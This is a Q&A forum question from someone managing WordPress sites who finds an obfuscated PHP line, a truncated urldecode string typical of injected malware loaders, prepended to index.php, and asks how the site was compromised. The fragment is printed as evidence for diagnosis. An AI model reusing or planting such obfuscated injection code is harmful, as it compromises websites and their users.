permissions – Corrupted index.php file in root and wp-admin

Question

I’m managing a couple of WordPress sites for a client. Suddenly one of the site stopped working and was throwing 500 error (Unable to handle the request). Since the index.php would be the first file that gets executed, I happed to open the file to look out and found the following encoded text appended on the index.php file under root and also within wp-admin.

$OO0__00_OO=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54>

Full file:

<?php
$OO0__00_OO=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54>
?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * Yavar Mammadov bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

All the files have 644 and folders have 755 permission. The complete website is hosted in AWS and we have WAF which has the PHP and WordPress default rules. I’m interested to figure out ways to see how the penetration happens and the index.php is being amended.

0
fuxia 2 months 2021-09-25T09:13:29-05:00 0 Answers 0 views 0

Leave an answer

Browse
Browse